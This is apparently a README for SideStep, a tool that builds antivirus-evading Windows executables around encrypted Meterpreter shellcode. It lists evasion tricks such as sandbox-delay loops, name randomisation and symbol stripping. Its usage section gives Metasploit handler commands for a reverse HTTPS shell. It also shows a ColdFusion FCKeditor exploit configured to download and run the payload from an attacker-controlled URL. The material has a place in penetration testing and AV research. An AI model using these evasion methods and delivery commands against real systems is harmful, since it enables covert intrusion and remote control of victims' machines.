generates Metasploit payloads encrypted using the CryptoPP library
(license included), and uses several other techniques to evade AV.
SideStep is a python script that automatically generates and compiles C code that uses encrypted Metasploit payloads.
Some of the features of SideStep used to evade AV software includes:
- Encrypts the msfvenom generated Meterpreter shellcode using AES
128bit encryption (using the CryptoPP C++ library) with a randomly
generated key. The payload is decrypted just prior to execution. - Randomizes all variable names and functions. The size of the names and functions is configurable.
- Creates a function that checks the local time on the host, then
loops for a configurable amount of seconds at the beginning of the
program, to evade AV sandboxes. There is also the addition of a DH
parameter generator which adds extra time to the startup. - Stuffs the executable with a configurable number of random variables
that have random values of a configurable size. These variables are
prior to the call to main(). This is a technique that is occasionally
effective and that I picked up from the NCC Group Metasploit Evasion
link above. - If Cygwin is present, it uses strip to remove debugging symbols and other useful reversing information.
- If you want to use peCloak, it will then encode the assembly instructions in the executable as the last step.
Requirements:
- Metasploit Community 4.11.1 – Update 2015031001 (or later – this is
what I tested with and some recent previous versions screwed up the
shellcode when using the alpha encoder) - Ruby 2.x
- Windows (7 or 8 should work – tested on 8.1)
- Python 2.7.x
- Visual Studio (free editions should be fine – tested on 2012)
- Windows SDK
- Cygwin with strip utility (if you want to strip debug symbols)
- peCloak (if you want to use it)
Usage
You must configure settings in confsettings.py, and then you must at
a minimum provide the Metasploit listening handler IP and port:
python sidestep.py –ip 192.168.1.1 –port 443
If using the defaults, then a source file will be generated in the
.source directory and the executable will be dropped in the .exe
directory.
Setup a Meterpreter handler on your attacking machine like so (modifying the PAYLOAD, LHOST, and LPORT as needed):
use multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.1.1
set LPORT 443
set AutoRunScript post/windows/manage/smart_migrate
run
The best way to deliver the executable via Metasploit is to load up your
exploit, and then set the PAYLOAD to windows/download_exec, and upload
the executable to a web server. Sample configuration:
use exploit/windows/http/coldfusion_fckeditor
set PAYLOAD windows/download_exec
set EXE sidestep.exe
set URL http://www.attacker.com:80/sidestep.exe
set AutoRunScript post/windows/manage/smart_migrate
set RHOST 1.1.1.1
set RPORT 80
run
This would exploit the FCKeditor vulnerability in ColdFusion
(CVE-2209-2265), running shellcode that downloads an executable from the
provided URL, saves it as the provided EXE name, and then executes it.
You can get the source code to SideStep here.